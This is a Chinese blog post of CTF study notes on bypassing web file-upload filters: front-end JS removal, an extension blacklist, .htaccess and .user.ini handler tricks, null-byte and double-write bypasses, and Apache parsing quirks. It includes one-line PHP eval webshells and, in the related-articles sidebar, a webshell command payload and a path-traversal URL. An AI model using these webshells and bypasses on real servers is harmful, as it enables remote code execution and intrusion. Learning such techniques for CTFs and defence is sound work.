CTF-WEB 文件上传绕过技巧

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量768 收藏 2
点赞数
分类专栏: 个人学习总结 文章标签: 前端 html linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51659538/article/details/127838025
版权

1、前端javascript绕过

#删除或者禁用js
#Burp Suite抓包修改文件类型与文件头等信息

2、后端检测——后缀名检测

#黑名单:html/htm/php/php2/php3/php4/php5/phtml/pwml/inc/asp/aspx/ascx/jsp/cfm/cfc/pl/bat/exe/com/dll/vbs/js/reg/cgi/htaccess/.user.ini/asis/sh/shtml/shm/phtm
#绕过方法:

.htaccess文件解析漏洞

条件: IIS7.0 IIS7.5 Nginx
作用范围:上传目录与其子目录
使用方法:

AddHandler php5-script .jpg

AddType application/x-httpd-php .jpg

<FilesMatch “muma.jpg”>
Sethandler application/x-httpd-php # 将该目录与及子目录下文件均按照php文件解析执行

00绕过

条件: php<5.3.4 and magic_quotes_gpc==OFF

双写绕过(敏感词替换为space

.user.ini

#条件:当前目录含有php文件
#上传.user.ini文件 内容为:auto_prepend_file=文件名
上传图片马
GIF89a
<?php eval($_POST['nk']);?>
<?= ?>
<? ?>

Apache解析漏洞

条件:apache 1.x apache 2.2.x
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.a.b的“.a”和“.b”这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。

@NK
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF技能梳理系列 ---- 文件
Joker_York的博客
09-02 1421
主要以CTFHub技能树里的文件题目为例 无验证 直接上webshell。 <?php @eval($_GET[cmd]); ?> payload: http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证 查看页面源码,可以看到前端的JS验证代码: <script> function checkfilesuffix() { var file=document.
CTF中文件包含的一些技巧
xiaoi123的博客
10-16 3916
i春秋作家:lem0n 原文来自:浅谈内存取证 0x00 前言 网络攻击内存化和网络犯罪隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得统的基于文件系统的计算机取证不能有效应对.内存取证作为文件系统取证的重要补充,是计算机取证科学的重要组成部分,通过全面获取内存数据、详尽分析内存数据,并在此基础上提取与网络攻击或网络犯罪相关的数字证据,近年来,内存取证已赢得安全...
验证绕过全解析
weixin_33941350的博客
04-19 670
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
【CTF】文件(知识点+例题)(1)
qq_53099119的博客
03-23 5091
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上一个名为1.png的木马文件,植入后门,将其上后,该文件文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTF-Web文件漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1483
文件漏洞学习笔记,ctfshow题目为依托
文件(包括编辑器上)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件漏洞可做参考)
weixin_42075643的博客
03-28 3827
文件绕过总结;编辑器文件;渗透测试记录
文件漏洞
qq_33137821的博客
04-30 1102
仅供学习使用
CTF 总结01:文件绕过
weixin_42789937的博客
12-11 5765
文件的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
攻防_漏洞_文件_文件漏洞详解
redglare的博客
10-22 2391
文件漏洞详解
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
8. **Web应用防火墙(WAF)**:了解WAF的工作原理,以及如何绕过和配置WAF以提高安全性。 9. **源代码审查**:学习通过查看源代码发现潜在的安全问题,以及如何编写更安全的代码。 10. **逆向工程与调试**:对于...
CtfHub-wp(web)
01-23
文件漏洞允许我们上PHP一句话木马,通过前端验证的绕过(例如在Firefox中禁用前端代码),或者利用`.htaccess`文件实现文件解析漏洞,将木马文件以非正常扩展名上。 `.htaccess`文件是Apache服务器上的一个...
CTF-writeup
03-19
了解如何在浏览器环境中限制和绕过这些限制是解决此类问题的关键。 4. **浏览器API滥用**:CTF中经常利用不常见的浏览器API进行攻击或隐藏信息,如Web Workers、Service Workers、Web Storage、WebRTC等。熟悉这些...
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
upload-labs文件靶场
11-24
通过反复的尝试和学习,不仅可以掌握文件漏洞的攻防技巧,还能提高对Web安全整体架构的理解。无论你是安全新手还是经验丰富的专业人员,upload-labs都能为你提供宝贵的学习机会,助你在网络安全的道路上更进一步...
CTFHUB-文件
m0_64180167的博客
12-25 1226
注意要改名字 我在这出现了问题是我没改文件名字 一直上失败 于是我又在后缀上加.php才上成功。发现失败了 试错后发现 我们一定要把上文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上
CTF中web文件基础知识
cutesharkl的博客
07-13 1146
文件漏洞:文件功能是许多Web应用程序的常见功能之一,但在实施不当的情况下,可能会导致安全漏洞。文件漏洞的出现可能会使攻击者能够上恶意文件,执行远程代码,绕过访问控制等。文件类型验证:Web应用程序通常会对上文件类型进行验证,以确保只允许特定类型的文件。这种验证可以通过检查文件扩展名或内容类型(MIME类型)来实现。然而,这种验证机制往往是不可靠的,因为攻击者可以伪造文件扩展名或篡改内容类型。
ctf题目php文件如何绕过_【Web-南邮CTF】Web-CTF入门第7天
weixin_39783149的博客
12-01 422
【黑客笔记--7天入门南邮CTF-WEB篇】综合题直接复制到浏览器的console中执行 获得新的提示信息如下: 1bc29b36f623ba82aaf6724fd3b16718.php 咱们去访问这个新的地址获得提示信息如下:打开burp suite 再次访问 查看响应报文获得提示信息如下: Linux操作系统~目录下有.bash_history文件 根据提示咱们访问/web3/b0b0ad11...
CTFHub-Web-文件
qq_54037445的博客
11-29 2858
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上图片中列出的类型将文件名后缀含有的这些全部替换为空。
【web安全】——文件绕过方式
热门推荐
Demo不是emo的博客
01-16 1万+
文件绕过姿势汇总,持续更新中
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值